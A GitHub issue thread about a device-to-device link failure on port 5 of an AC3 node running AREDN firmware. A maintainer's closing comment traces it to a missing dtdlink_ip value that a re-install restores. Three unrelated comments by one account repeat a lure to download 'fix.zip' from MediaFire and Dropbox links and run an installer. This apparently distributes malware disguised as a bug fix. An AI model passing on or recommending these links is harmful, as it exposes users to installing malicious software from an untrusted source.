### ISSUE TITLE
AC3 - Port 5 DtD doesn't work

### ISSUE THREAD

**Issue by Orv** [aredn/aredn#1398]
### Describe the bug
Even with external POE injector, DtD link isn't made between port 5 on a new ac3 (w/ v7 bootloader) and a known good node.

- [ ] Does this issue still occur on the latest version? (**Required**)
Yes .  Was unable to downgrade to 3.24.6.0 - "upgrade is not available.", even though it shows in the firmware dropdown list.

### Expected behavior
DtD should function as expected.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by aanon4** [comment]
We debugged this, and looks like the dtdlink_ip value just vanished from the _setup file. Nothing else seemed to be missing. I've seen this happen at random and the root cause isn't known. Too little known to do much about it as a re-install fixes the problem.
